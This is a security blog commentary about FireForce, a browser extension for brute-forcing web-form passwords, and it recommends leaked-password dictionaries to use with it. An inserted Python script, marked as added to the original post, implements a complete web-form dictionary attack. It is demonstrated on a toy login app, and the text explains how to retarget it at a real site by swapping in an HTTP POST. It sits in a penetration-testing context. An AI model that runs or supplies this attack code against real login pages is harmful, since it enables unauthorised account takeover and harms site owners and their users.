Commentary

That Was Easy: New Tool For Web Form Password Brute Force Attacks

Passwords suck. We all know it, but unless you can afford to provide multifactor authentication to all of your users and business partners, you're stuck with them.

Implementing technical controls that enforce strong password creation is a necessity because users will pick weak passwords when given the opportunity. Sure, there are exceptions to the rule, but those aren't the ones we worry about as security professionals. We worry about the passwords that are easy to crack.

Back in March, Ron Bowes posted a great blog titled "Hard evidence that people suck at passwords." Ron takes a look at passwords leaked by attackers who breached sites like phpBB, Faithwriters, and Elite Hackers, and he provides some interesting insight into the password choices users make.

Also, it's worth noting that Ron is currently hosting password dictionaries that come from various sources, like password cracking tools and leaked password lists from compromised websites. They are very useful with the tool I'm about to talk about.

In a discussion about password brute forcing on the Metasploit Framework mailing list, someone pointed out a Firefox extension that enables brute force password attacks against Web forms from right within the browser. It's FireForce, and it is available here.

What a simple but useful and powerful tool! Typically, we refrain from password attacks because of account lockout issues, but sometimes we encounter Web apps with a local user authentication source that has no lockout feature. FireForce is simple in its implementation, but powerful enough to brute force just passwords, or both user names and passwords.

Teamed with the passwords hosted at SkullSecurity, FireForce is nearly unstoppable, but it's not a replacement for Medusa. Be sure to read the documentation for info about running separate Firefox instances and configuring the user name and password brute forcing properly -- the dictionary selection is a little backward.
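To make the technique concrete, here is an added example of what a tool like FireForce does under the hood: submit a login form once per candidate credential, treat any response that lacks the application's failure text as a hit, and stop on a lockout message. This is not FireForce's code and not from the original post. The target web app is a constructed in-process stand-in (the account list, the form field names and the response strings are all assumptions) so the script runs offline; against a real form you would supply a function that POSTs the fields and returns the response body.

```python
"""Web-form dictionary attack, in the style of FireForce (added example, not FireForce's code).

The "web app" below is a constructed stand-in so this runs offline. For a real
engagement you would pass a callable that POSTs the field dict to the login URL
and returns the response body as a string.
"""
from typing import Callable, Dict, Iterable, List, Set, Tuple

# Constructed toy application standing in for the target login form.
# Field names, accounts and response strings are assumptions for the example.
class ToyLoginApp:
    def __init__(self, accounts: Dict[str, str], lockout_threshold: int = 0):
        self.accounts = accounts            # username -> password
        self.lockout_threshold = lockout_threshold  # 0 = no lockout
        self.failures: Dict[str, int] = {}

    def post(self, fields: Dict[str, str]) -> str:
        """Handle one login POST and return the page body."""
        user, pw = fields.get("username", ""), fields.get("password", "")
        if self.lockout_threshold and self.failures.get(user, 0) >= self.lockout_threshold:
            return "<p>Account locked. Contact your administrator.</p>"
        if self.accounts.get(user) == pw:
            return "<h1>Welcome, %s</h1>" % user
        self.failures[user] = self.failures.get(user, 0) + 1
        return "<p>Invalid username or password.</p>"


def brute_force_form(
    post: Callable[[Dict[str, str]], str],
    users: Iterable[str],
    passwords: Iterable[str],
    failure_marker: str,
    lockout_marker: str = "",
) -> Tuple[List[Tuple[str, str]], Set[str]]:
    """Try every (user, password) pair against the form.

    Success is inferred the way form brute forcers usually do it: the response no
    longer contains the text shown on a failed login. A single-element `users`
    list gives password-only mode; several users gives user+password mode.
    Returns (credentials found, users that hit a lockout).
    """
    found: List[Tuple[str, str]] = []
    locked: Set[str] = set()
    pw_list = list(passwords)   # dictionaries are reused for every user
    for user in users:
        for pw in pw_list:
            body = post({"username": user, "password": pw})
            if lockout_marker and lockout_marker in body:
                # Stop hammering this account: further guesses are wasted and
                # the lockout itself is noisy for the target's admins.
                locked.add(user)
                break
            if failure_marker not in body:
                found.append((user, pw))
                break               # move on to the next user
    return found, locked


# Constructed wordlist; a real run would use a SkullSecurity-style dictionary,
# ordered most-common-first so the likely hits come early.
WORDLIST = ["123456", "password", "letmein", "qwerty", "Password1"]


def demo_no_lockout() -> List[Tuple[str, str]]:
    """User+password mode against an app with no lockout."""
    app = ToyLoginApp({"jsmith": "letmein", "admin": "Password1"})
    found, _ = brute_force_form(app.post, ["jsmith", "admin", "nobody"], WORDLIST,
                                failure_marker="Invalid username or password")
    return found


def demo_with_lockout() -> Tuple[List[Tuple[str, str]], Set[str]]:
    """Same attack where the app locks after 3 failures: the correct password
    is 5th in the list, so the attack locks the account before reaching it."""
    app = ToyLoginApp({"admin": "Password1"}, lockout_threshold=3)
    return brute_force_form(app.post, ["admin"], WORDLIST,
                            failure_marker="Invalid username or password",
                            lockout_marker="Account locked")


if __name__ == "__main__":
    print("no lockout:", demo_no_lockout())
    print("with lockout:", demo_with_lockout())
```

The second demo is the caveat from the paragraph above in code form: with a three-strike lockout, the attacker never gets to the valid password and instead leaves a locked account behind, which is exactly why this class of attack is normally reserved for authentication sources that lack a lockout feature. Swapping in a real target means replacing `app.post` with a function that does the HTTP POST (for example, one built on a library such as `requests`) and setting `failure_marker` to whatever the application's own failed-login page says.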

Addendum: Here is the link that was sent to the Metasploit Express users mailing list. Thanks, Jason.

John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.
